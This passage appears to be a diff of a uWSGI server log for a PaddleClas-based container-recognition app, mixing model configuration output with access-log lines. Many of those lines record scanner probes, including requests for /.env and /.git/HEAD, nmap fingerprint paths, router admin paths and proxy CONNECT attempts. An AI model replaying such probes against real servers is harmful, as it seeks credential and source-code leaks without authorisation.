659/770] 103.207.42.166 () {40 vars in 697 bytes} [Mon Feb 7 15:11:55 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 660/771] 8.142.43.130 () {24 vars in 259 bytes} [Mon Feb 7 15:35:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 661/772] 8.142.43.130 () {34 vars in 636 bytes} [Mon Feb 7 15:35:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 662/773] 111.196.124.162 () {38 vars in 597 bytes} [Mon Feb 7 16:10:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 663/774] 111.196.124.162 () {38 vars in 619 bytes} [Mon Feb 7 16:10:52 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 664/775] 111.196.124.162 () {38 vars in 597 bytes} [Mon Feb 7 16:10:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 665/776] 111.196.124.162 () {38 vars in 619 bytes} [Mon Feb 7 16:10:52 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 666/777] 35.245.215.165 () {28 vars in 355 bytes} [Mon Feb 7 16:50:47 2022] GET /?q=%compost%&t=h_&ia=web => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 667/778] 172.105.87.91 () {22 vars in 234 bytes} [Mon Feb 7 17:17:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 668/779] 172.105.87.91 () {22 vars in 296 bytes} [Mon Feb 7 17:17:19 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 669/780] 172.105.87.91 () {22 vars in 238 bytes} [Mon Feb 7 17:17:20 2022] OPTIONS / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 670/781] 172.105.87.91 () {22 vars in 238 bytes} [Mon Feb 7 17:17:21 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 671/782] 172.105.87.91 () {40 vars in 484 bytes} [Mon Feb 7 17:17:21 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 672/783] 172.105.87.91 () {32 vars in 361 bytes} [Mon Feb 7 17:17:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 26/784] 172.105.87.91 () {32 vars in 369 bytes} [Mon Feb 7 17:17:25 2022] GET /6pNh => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 27/785] 172.105.87.91 () {32 vars in 397 bytes} [Mon Feb 7 17:17:25 2022] GET /Portal/Portal.mwsl => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 28/786] 172.105.87.91 () {32 vars in 389 bytes} [Mon Feb 7 17:17:25 2022] GET /Portal0000.htm => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 66/787] 172.105.87.91 () {24 vars in 252 bytes} [Mon Feb 7 17:17:25 2022] OPTIONS * => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 7/788] 172.105.87.91 () {32 vars in 409 bytes} [Mon Feb 7 17:17:25 2022] GET /nmaplowercheck1644254244 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 5/789] 172.105.87.91 () {32 vars in 383 bytes} [Mon Feb 7 17:17:25 2022] GET /index.jhtml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 6/790] 172.105.87.91 () {32 vars in 379 bytes} [Mon Feb 7 17:17:25 2022] GET /.git/HEAD => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 7/791] 172.105.87.91 () {32 vars in 403 bytes} [Mon Feb 7 17:17:26 2022] GET /docs/cplugError.html/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 2/792] 172.105.87.91 () {32 vars in 385 bytes} [Mon Feb 7 17:17:26 2022] GET /__Additional => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 5/793] 172.105.87.91 () {36 vars in 462 bytes} [Mon Feb 7 17:17:26 2022] POST /scripts/WPnBr.dll => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 6/794] 172.105.87.91 () {32 vars in 442 bytes} [Mon Feb 7 17:17:26 2022] GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 7/795] 172.105.87.91 () {32 vars in 403 bytes} [Mon Feb 7 17:17:26 2022] GET /pools/default/buckets => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 673/796] 172.105.87.91 () {32 vars in 371 bytes} [Mon Feb 7 17:17:26 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 674/797] 172.105.87.91 () {34 vars in 397 bytes} [Mon Feb 7 17:17:26 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 675/798] 172.105.87.91 () {32 vars in 377 bytes} [Mon Feb 7 17:17:26 2022] GET /menu.jsp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 676/799] 172.105.87.91 () {32 vars in 442 bytes} [Mon Feb 7 17:17:26 2022] GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 677/800] 172.105.87.91 () {32 vars in 379 bytes} [Mon Feb 7 17:17:26 2022] GET /start.cgi => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 678/801] 172.105.87.91 () {32 vars in 362 bytes} [Mon Feb 7 17:17:27 2022] HEAD / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 679/802] 172.105.87.91 () {32 vars in 377 bytes} [Mon Feb 7 17:17:27 2022] GET /base.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 680/803] 172.105.87.91 () {32 vars in 361 bytes} [Mon Feb 7 17:17:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 681/804] 172.105.87.91 () {32 vars in 383 bytes} [Mon Feb 7 17:17:28 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 682/805] 172.105.87.91 () {28 vars in 389 bytes} [Mon Feb 7 17:17:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 683/806] 183.136.225.56 () {34 vars in 535 bytes} [Mon Feb 7 18:13:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 684/807] 179.43.170.170 () {40 vars in 629 bytes} [Mon Feb 7 20:45:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 685/808] 106.75.64.59 () {30 vars in 327 bytes} [Mon Feb 7 21:28:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 686/809] 20.55.53.144 () {34 vars in 495 bytes} [Mon Feb 7 21:56:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 687/810] 209.17.96.82 () {30 vars in 409 bytes} [Mon Feb 7 23:10:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 688/811] 47.92.105.73 () {34 vars in 458 bytes} [Tue Feb 8 01:18:35 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 689/812] 179.43.170.170 () {40 vars in 629 bytes} [Tue Feb 8 02:16:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 690/813] 65.49.20.69 () {28 vars in 305 bytes} [Tue Feb 8 02:21:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 691/814] 23.250.19.242 () {34 vars in 536 bytes} [Tue Feb 8 02:58:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 692/815] 23.250.19.242 () {30 vars in 359 bytes} [Tue Feb 8 02:58:44 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 693/816] 23.250.19.242 () {30 vars in 361 bytes} [Tue Feb 8 02:58:45 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 694/817] 23.250.19.242 () {30 vars in 387 bytes} [Tue Feb 8 02:58:46 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 695/818] 23.250.19.242 () {36 vars in 514 bytes} [Tue Feb 8 02:58:47 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 696/819] 130.211.54.158 () {42 vars in 565 bytes} [Tue Feb 8 02:58:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 697/820] 52.159.87.123 () {36 vars in 500 bytes} [Tue Feb 8 02:59:37 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 698/821] 52.159.87.123 () {36 vars in 514 bytes} [Tue Feb 8 02:59:37 2022] GET /wp-content/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 699/822] 222.186.19.207 () {26 vars in 341 bytes} [Tue Feb 8 03:19:34 2022] CONNECT fuwu.sogou.com:443 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 67/823] 222.186.19.207 () {30 vars in 504 bytes} [Tue Feb 8 03:19:34 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 46842] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 700/824] 179.43.170.170 () {40 vars in 629 bytes} [Tue Feb 8 07:52:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 701/825] 45.95.169.102 () {40 vars in 567 bytes} [Tue Feb 8 07:57:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 702/826] 109.237.103.9 () {36 vars in 523 bytes} [Tue Feb 8 10:24:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 703/827] 91.236.239.224 () {36 vars in 493 bytes} [Tue Feb 8 11:39:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 704/828] 91.236.239.224 () {38 vars in 527 bytes} [Tue Feb 8 11:40:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 705/829] 185.180.143.7 () {34 vars in 487 bytes} [Tue Feb 8 11:54:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 706/830] 185.180.143.7 () {34 vars in 501 bytes} [Tue Feb 8 11:54:36 2022] GET /backend => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 707/831] 34.140.248.32 () {42 vars in 563 bytes} [Tue Feb 8 12:52:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 3/832] 5.8.10.202 () {34 vars in 500 bytes} [Tue Feb 8 12:54:37 2022] GET /aaa9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 708/833] 5.8.10.202 () {34 vars in 500 bytes} [Tue Feb 8 12:54:39 2022] GET /aab9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:02:59 INFO: +2022-02-08 13:57:19 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2032,77 +3941,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:02:59 INFO: DetPostProcess : -2021-11-03 04:02:59 INFO: DetPreProcess : -2021-11-03 04:02:59 INFO: transform_ops : -2021-11-03 04:02:59 INFO: DetResize : -2021-11-03 04:02:59 INFO: interp : 2 -2021-11-03 04:02:59 INFO: keep_ratio : False -2021-11-03 04:02:59 INFO: target_size : [640, 640] -2021-11-03 04:02:59 INFO: DetNormalizeImage : -2021-11-03 04:02:59 INFO: is_scale : True -2021-11-03 04:02:59 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:59 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:59 INFO: DetPermute : -2021-11-03 04:02:59 INFO: Global : -2021-11-03 04:02:59 INFO: batch_size : 1 -2021-11-03 04:02:59 INFO: cpu_num_threads : 10 -2021-11-03 04:02:59 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:02:59 INFO: enable_benchmark : True -2021-11-03 04:02:59 INFO: enable_mkldnn : True -2021-11-03 04:02:59 INFO: enable_profile : False -2021-11-03 04:02:59 INFO: gpu_mem : 8000 -2021-11-03 04:02:59 INFO: image_shape : [3, 640, 640] -2021-11-03 04:02:59 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:02:59 INFO: ir_optim : True -2021-11-03 04:02:59 INFO: labe_list : ['foreground'] -2021-11-03 04:02:59 INFO: max_det_results : 5 -2021-11-03 04:02:59 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:02:59 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:02:59 INFO: threshold : 0.2 -2021-11-03 04:02:59 INFO: use_fp16 : False -2021-11-03 04:02:59 INFO: use_gpu : False -2021-11-03 04:02:59 INFO: use_tensorrt : False -2021-11-03 04:02:59 INFO: IndexProcess : -2021-11-03 04:02:59 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:02:59 INFO: return_k : 5 -2021-11-03 04:02:59 INFO: score_thres : 0.5 -2021-11-03 04:02:59 INFO: RecPostProcess : None -2021-11-03 04:02:59 INFO: RecPreProcess : -2021-11-03 04:02:59 INFO: transform_ops : -2021-11-03 04:02:59 INFO: ResizeImage : -2021-11-03 04:02:59 INFO: size : 224 -2021-11-03 04:02:59 INFO: NormalizeImage : -2021-11-03 04:02:59 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:59 INFO: order : -2021-11-03 04:02:59 INFO: scale : 0.00392157 -2021-11-03 04:02:59 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:59 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2379.9116611480713 ms per batch image +2022-02-08 13:57:19 INFO: DetPostProcess : +2022-02-08 13:57:19 INFO: DetPreProcess : +2022-02-08 13:57:19 INFO: transform_ops : +2022-02-08 13:57:19 INFO: DetResize : +2022-02-08 13:57:19 INFO: interp : 2 +2022-02-08 13:57:19 INFO: keep_ratio : False +2022-02-08 13:57:19 INFO: target_size : [640, 640] +2022-02-08 13:57:19 INFO: DetNormalizeImage : +2022-02-08 13:57:19 INFO: is_scale : True +2022-02-08 13:57:19 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:57:19 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:19 INFO: DetPermute : +2022-02-08 13:57:19 INFO: Global : +2022-02-08 13:57:19 INFO: batch_size : 1 +2022-02-08 13:57:19 INFO: cpu_num_threads : 1 +2022-02-08 13:57:19 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 13:57:19 INFO: enable_benchmark : True +2022-02-08 13:57:19 INFO: enable_mkldnn : True +2022-02-08 13:57:19 INFO: enable_profile : False +2022-02-08 13:57:19 INFO: gpu_mem : 8000 +2022-02-08 13:57:19 INFO: image_shape : [3, 640, 640] +2022-02-08 13:57:19 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 13:57:19 INFO: ir_optim : True +2022-02-08 13:57:19 INFO: labe_list : ['foreground'] +2022-02-08 13:57:19 INFO: max_det_results : 5 +2022-02-08 13:57:19 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 13:57:19 INFO: rec_nms_thresold : 0.05 +2022-02-08 13:57:19 INFO: threshold : 0.2 +2022-02-08 13:57:19 INFO: use_fp16 : False +2022-02-08 13:57:19 INFO: use_gpu : False +2022-02-08 13:57:19 INFO: use_tensorrt : False +2022-02-08 13:57:19 INFO: IndexProcess : +2022-02-08 13:57:19 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 13:57:19 INFO: return_k : 5 +2022-02-08 13:57:19 INFO: score_thres : 0.5 +2022-02-08 13:57:19 INFO: RecPostProcess : None +2022-02-08 13:57:19 INFO: RecPreProcess : +2022-02-08 13:57:19 INFO: transform_ops : +2022-02-08 13:57:19 INFO: ResizeImage : +2022-02-08 13:57:19 INFO: size : 224 +2022-02-08 13:57:19 INFO: NormalizeImage : +2022-02-08 13:57:19 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:57:19 INFO: order : +2022-02-08 13:57:19 INFO: scale : 0.00392157 +2022-02-08 13:57:19 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:19 INFO: ToCHWImage : None +Inference: 374.39537048339844 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 9/16] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:02:58 2021] POST /reference_client/ => generated 98 bytes in 6120 msecs (HTTP/1.1 200) 5 headers in 157 bytes (11 switches on core 0) -[pid: 32765|app: 0|req: 10/17] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 04:13:19 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 7/18] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 04:13:21 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 709/834] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 13:57:18 2022] POST /reference_client/ => generated 98 bytes in 3040 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) req -2021-11-03 04:23:09 INFO: +2022-02-08 13:57:25 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2112,77 +4003,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:23:09 INFO: DetPostProcess : -2021-11-03 04:23:09 INFO: DetPreProcess : -2021-11-03 04:23:09 INFO: transform_ops : -2021-11-03 04:23:09 INFO: DetResize : -2021-11-03 04:23:09 INFO: interp : 2 -2021-11-03 04:23:09 INFO: keep_ratio : False -2021-11-03 04:23:09 INFO: target_size : [640, 640] -2021-11-03 04:23:09 INFO: DetNormalizeImage : -2021-11-03 04:23:09 INFO: is_scale : True -2021-11-03 04:23:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:23:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:23:09 INFO: DetPermute : -2021-11-03 04:23:09 INFO: Global : -2021-11-03 04:23:09 INFO: batch_size : 1 -2021-11-03 04:23:09 INFO: cpu_num_threads : 10 -2021-11-03 04:23:09 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:23:09 INFO: enable_benchmark : True -2021-11-03 04:23:09 INFO: enable_mkldnn : True -2021-11-03 04:23:09 INFO: enable_profile : False -2021-11-03 04:23:09 INFO: gpu_mem : 8000 -2021-11-03 04:23:09 INFO: image_shape : [3, 640, 640] -2021-11-03 04:23:09 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:23:09 INFO: ir_optim : True -2021-11-03 04:23:09 INFO: labe_list : ['foreground'] -2021-11-03 04:23:09 INFO: max_det_results : 5 -2021-11-03 04:23:09 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:23:09 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:23:09 INFO: threshold : 0.2 -2021-11-03 04:23:09 INFO: use_fp16 : False -2021-11-03 04:23:09 INFO: use_gpu : False -2021-11-03 04:23:09 INFO: use_tensorrt : False -2021-11-03 04:23:09 INFO: IndexProcess : -2021-11-03 04:23:09 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:23:09 INFO: return_k : 5 -2021-11-03 04:23:09 INFO: score_thres : 0.5 -2021-11-03 04:23:09 INFO: RecPostProcess : None -2021-11-03 04:23:09 INFO: RecPreProcess : -2021-11-03 04:23:09 INFO: transform_ops : -2021-11-03 04:23:09 INFO: ResizeImage : -2021-11-03 04:23:09 INFO: size : 224 -2021-11-03 04:23:09 INFO: NormalizeImage : -2021-11-03 04:23:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:23:09 INFO: order : -2021-11-03 04:23:09 INFO: scale : 0.00392157 -2021-11-03 04:23:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:23:09 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2216.3712978363037 ms per batch image +2022-02-08 13:57:25 INFO: DetPostProcess : +2022-02-08 13:57:25 INFO: DetPreProcess : +2022-02-08 13:57:25 INFO: transform_ops : +2022-02-08 13:57:25 INFO: DetResize : +2022-02-08 13:57:25 INFO: interp : 2 +2022-02-08 13:57:25 INFO: keep_ratio : False +2022-02-08 13:57:25 INFO: target_size : [640, 640] +2022-02-08 13:57:25 INFO: DetNormalizeImage : +2022-02-08 13:57:25 INFO: is_scale : True +2022-02-08 13:57:25 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:57:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:25 INFO: DetPermute : +2022-02-08 13:57:25 INFO: Global : +2022-02-08 13:57:25 INFO: batch_size : 1 +2022-02-08 13:57:25 INFO: cpu_num_threads : 1 +2022-02-08 13:57:25 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 13:57:25 INFO: enable_benchmark : True +2022-02-08 13:57:25 INFO: enable_mkldnn : True +2022-02-08 13:57:25 INFO: enable_profile : False +2022-02-08 13:57:25 INFO: gpu_mem : 8000 +2022-02-08 13:57:25 INFO: image_shape : [3, 640, 640] +2022-02-08 13:57:25 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 13:57:25 INFO: ir_optim : True +2022-02-08 13:57:25 INFO: labe_list : ['foreground'] +2022-02-08 13:57:25 INFO: max_det_results : 5 +2022-02-08 13:57:25 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 13:57:25 INFO: rec_nms_thresold : 0.05 +2022-02-08 13:57:25 INFO: threshold : 0.2 +2022-02-08 13:57:25 INFO: use_fp16 : False +2022-02-08 13:57:25 INFO: use_gpu : False +2022-02-08 13:57:25 INFO: use_tensorrt : False +2022-02-08 13:57:25 INFO: IndexProcess : +2022-02-08 13:57:25 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 13:57:25 INFO: return_k : 5 +2022-02-08 13:57:25 INFO: score_thres : 0.5 +2022-02-08 13:57:25 INFO: RecPostProcess : None +2022-02-08 13:57:25 INFO: RecPreProcess : +2022-02-08 13:57:25 INFO: transform_ops : +2022-02-08 13:57:25 INFO: ResizeImage : +2022-02-08 13:57:25 INFO: size : 224 +2022-02-08 13:57:25 INFO: NormalizeImage : +2022-02-08 13:57:25 INFO: mean : 